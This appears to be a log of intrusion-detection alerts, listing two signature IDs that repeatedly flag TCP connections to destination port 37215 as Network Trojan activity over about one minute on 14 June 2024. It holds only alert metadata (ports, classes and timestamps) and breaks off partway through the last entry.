                SID:2829579
                Source Port:40866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942623
                SID:2835222
                Source Port:45016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828303
                SID:2829579
                Source Port:39780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790238
                SID:2835222
                Source Port:45178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943362
                SID:2829579
                Source Port:46616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791047
                SID:2829579
                Source Port:58068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277887
                SID:2835222
                Source Port:55746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545205
                SID:2829579
                Source Port:54940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.018758
                SID:2835222
                Source Port:59572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163143
                SID:2835222
                Source Port:59744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185354
                SID:2835222
                Source Port:35502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.182956
                SID:2829579
                Source Port:44698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714977
                SID:2835222
                Source Port:50778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645698
                SID:2829579
                Source Port:38090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624398
                SID:2835222
                Source Port:46788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.020687
                SID:2835222
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.829276
                SID:2829579
                Source Port:34352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.780073
                SID:2829579
                Source Port:44320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.021960
                SID:2829579
                Source Port:37836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968955
                SID:2835222
                Source Port:40342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913993
                SID:2829579
                Source Port:49680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228032
                SID:2829579
                Source Port:46264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.617697
                SID:2829579
                Source Port:40276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941567
                SID:2835222
                Source Port:35068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734384
                SID:2835222
                Source Port:36948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760034
                SID:2829579
                Source Port:44874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806528
                SID:2835222
                Source Port:40378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897214
                SID:2829579
                Source Port:40686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972251
                SID:2829579
                Source Port:57490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.473507
                SID:2829579
                Source Port:46400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242349
                SID:2835222
                Source Port:38244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025550
                SID:2829579
                Source Port:42428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503100
                SID:2835222
                Source Port:56878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902390
                SID:2835222
                Source Port:59618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805119
                SID:2835222
                Source Port:51812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716729
                SID:2835222
                Source Port:46494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503754
                SID:2835222
                Source Port:38294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.341831
                SID:2835222
                Source Port:34260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111161
                SID:2835222
                Source Port:60830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.134118
                SID:2829579
                Source Port:34184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.054184
                SID:2829579
                Source Port:38336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.987635
                SID:2829579
                Source Port:41994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861287
                SID:2835222
                Source Port:56068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808082
                SID:2829579
                Source Port:44394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668299
                SID:2835222
                Source Port:32794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827596
                SID:2829579
                Source Port:37498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969028
                SID:2829579
                Source Port:40764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807126
                SID:2829579
                Source Port:52056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.764067
                SID:2835222
                Source Port:45022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677487
                SID:2835222
                Source Port:46556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858423
                SID:2835222
                Source Port:40596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861534
                SID:2829579
                Source Port:54022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045531
                SID:2835222
                Source Port:43738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.780042
                SID:2829579
                Source Port:50460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968335
                SID:2829579
                Source Port:47474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969593
                SID:2835222
                Source Port:53204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860400
                SID:2829579
                Source Port:59394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014872
                SID:2835222
                Source Port:35098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177576
                SID:2835222
                Source Port:36548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382843
                SID:2829579
                Source Port:48478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504013
                SID:2829579
                Source Port:32812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029141
                SID:2829579
                Source Port:39742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.448602
                SID:2835222
                Source Port:38642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177752
                SID:2835222
                Source Port:35018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275596
                SID:2835222
                Source Port:54098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133466
                SID:2835222
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.940585
                SID:2829579
                Source Port:40398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968115
                SID:2829579
                Source Port:59386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111133
                SID:2835222
                Source Port:59048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.289613
                SID:2835222
                Source Port:54514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.804823
                SID:2835222
                Source Port:46914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163454
                SID:2835222
                Source Port:38136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091098
                SID:2835222
                Source Port:55998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724249
                SID:2829579
                Source Port:42128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.276373
                SID:2829579
                Source Port:40458
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243940
                SID:2835222
                Source Port:39470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.565757
                SID:2835222
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.883187
                SID:2835222
                Source Port:38172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616781
                SID:2835222
                Source Port:55414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980798
                SID:2829579
                Source Port:57328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763500
                SID:2835222
                Source Port:40038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519824
                SID:2835222
                Source Port:56040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998672
                SID:2829579
                Source Port:51556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681680
                SID:2835222
                Source Port:42786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230012
                SID:2829579
                Source Port:55196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.906359
                SID:2829579
                Source Port:60016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.084207
                SID:2835222
                Source Port:49814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.150784
                SID:2829579
                Source Port:54000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.091143
                SID:2835222
                Source Port:33886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.110731
                SID:2835222
                Source Port:39020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150126
                SID:2835222
                Source Port:33024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021800
                SID:2829579
                Source Port:57814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295613
                SID:2835222
                Source Port:40690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.615881
                SID:2835222
                Source Port:56974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734782
                SID:2835222
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968899
                SID:2829579
                Source Port:40546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.277909
                SID:2829579
                Source Port:34422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245248
                SID:2829579
                Source Port:53000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827840
                SID:2835222
                Source Port:49950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452583
                SID:2835222
                Source Port:52398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672619
                SID:2835222
                Source Port:51742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.969482
                SID:2835222
                Source Port:54238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.759161
                SID:2835222
                Source Port:48362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150938
                SID:2829579
                Source Port:42626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411272
                SID:2829579
                Source Port:49334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411492
                SID:2835222
                Source Port:37348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762746
                SID:2835222
                Source Port:55772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913514
                SID:2829579
                Source Port:56376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564043
                SID:2829579
                Source Port:53968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.412128
                SID:2835222
                Source Port:37214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452220
                SID:2829579
                Source Port:58338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381603
                SID:2829579
                Source Port:47548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805155
                SID:2835222
                Source Port:56226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860452
                SID:2829579
                Source Port:35064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001447
                SID:2835222
                Source Port:42072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013636
                SID:2829579
                Source Port:40700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.422923
                SID:2829579
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452707
                SID:2835222
                Source Port:38220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979466
                SID:2835222
                Source Port:49912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149515
                SID:2829579
                Source Port:56758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013178
                SID:2835222
                Source Port:43462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.045708
                SID:2835222
                Source Port:43746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092400
                SID:2835222
                Source Port:36108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.548891
                SID:2829579
                Source Port:55902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245712
                SID:2835222
                Source Port:57146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177137
                SID:2835222
                Source Port:60184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.723275
                SID:2835222
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791352
                SID:2829579
                Source Port:53040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716969
                SID:2835222
                Source Port:42344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.027739
                SID:2829579
                Source Port:54634
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808154
                SID:2829579
                Source Port:58100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.716792
                SID:2835222
                Source Port:48896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.202777
                SID:2835222
                Source Port:49116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323668
                SID:2829579
                Source Port:40454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146319
                SID:2829579
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.503299
                SID:2835222
                Source Port:46558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.410710
                SID:2835222
                Source Port:33766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984145
                SID:2835222
                Source Port:55446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518577
                SID:2835222
                Source Port:47490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504038
                SID:2835222
                Source Port:51836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857718
                SID:2829579
                Source Port:57908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.899228
                SID:2835222
                Source Port:38622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.029872
                SID:2835222
                Source Port:60110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115618
                SID:2829579
                Source Port:48830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.148456
                SID:2829579
                Source Port:51454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073458
                SID:2829579
                Source Port:60662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732578
                SID:2835222
                Source Port:52440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861092
                SID:2829579
                Source Port:54506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274973
                SID:2835222
                Source Port:35824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343524
                SID:2835222
                Source Port:45428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012982
                SID:2835222
                Source Port:35644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.724299
                SID:2835222
                Source Port:42832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.021975
                SID:2829579
                Source Port:39548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715267
                SID:2835222
                Source Port:40816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.904964
                SID:2835222
                Source Port:51690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616416
                SID:2835222
                Source Port:38702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451391
                SID:2829579
                Source Port:33112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.705666
                SID:2829579
                Source Port:49198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.763577
                SID:2835222
                Source Port:46886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790376
                SID:2835222
                Source Port:38524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897996
                SID:2829579
                Source Port:37460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017308
                SID:2829579
                Source Port:54912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.969373
                SID:2835222
                Source Port:53416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984917
                SID:2829579
                Source Port:47462
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980655
                SID:2829579
                Source Port:33404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.343479
                SID:2835222
                Source Port:52078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916802
                SID:2835222
                Source Port:60926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072594
                SID:2829579
                Source Port:56208
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.701326
                SID:2835222
                Source Port:33550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292905
                SID:2835222
                Source Port:43486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.998732
                SID:2829579
                Source Port:35686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859900
                SID:2835222
                Source Port:59670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.682910
                SID:2829579
                Source Port:56326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.404652
                SID:2835222
                Source Port:37616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859381
                SID:2829579
                Source Port:46648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.647141
                SID:2835222
                Source Port:35248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.384364
                SID:2835222
                Source Port:56428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453562
                SID:2829579
                Source Port:58524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.980528
                SID:2835222
                Source Port:56918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.544007
                SID:2829579
                Source Port:51420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133396
                SID:2829579
                Source Port:45670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.023803
                SID:2829579
                Source Port:50200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806991
                SID:2829579
                Source Port:39120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791244
                SID:2829579
                Source Port:49906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019739
                SID:2835222
                Source Port:51328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152219
                SID:2829579
                Source Port:56276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860328
                SID:2835222
                Source Port:58444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.733039
                SID:2835222
                Source Port:47452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383253
                SID:2829579
                Source Port:52432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517427
                SID:2835222
                Source Port:39940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132755
                SID:2829579
                Source Port:49234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421576
                SID:2835222
                Source Port:51368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917706
                SID:2835222
                Source Port:39534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762466
                SID:2829579
                Source Port:35380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.966821
                SID:2835222
                Source Port:53602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944178
                SID:2829579
                Source Port:57454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859336
                SID:2835222
                Source Port:39630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184709
                SID:2835222
                Source Port:37328
                Destination Port:37215
